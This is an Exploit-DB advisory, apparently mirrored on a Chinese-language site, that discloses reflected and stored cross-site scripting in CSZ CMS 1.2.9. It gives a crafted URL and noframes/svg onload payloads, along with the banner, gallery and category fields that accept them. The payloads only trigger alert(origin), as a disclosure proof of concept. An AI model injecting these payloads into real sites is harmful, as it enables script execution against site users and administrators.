CSZ CMS 1.2.9 – Multiple Cross-Site Scripting

  • 作者: SunCSR
    日期: 2021-01-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49364/
  • # Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
    # Date: 2020/12/28
    # Exploit Author: SunCSR
    # Vendor Homepage: https://www.cszcms.com/
    # Software Link: https://github.com/cskaza/cszcms
    # Version: 1.2.9
    # Tested on: CSZ CMS 1.2.9
    
    1. Reflected XSS
    Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
    <http://localhost/pluginabc%22-alert%28origin%29-%22abc>
    
    2. Stored XSS
    
    Use an editor account with rights to manage banners, plugins.
    
    + Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    
    + Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p
    title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p
    title="</noframes><svg/onload=alert(origin)>">
    
    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p
    title="</noframes><svg/onload=alert(origin)>">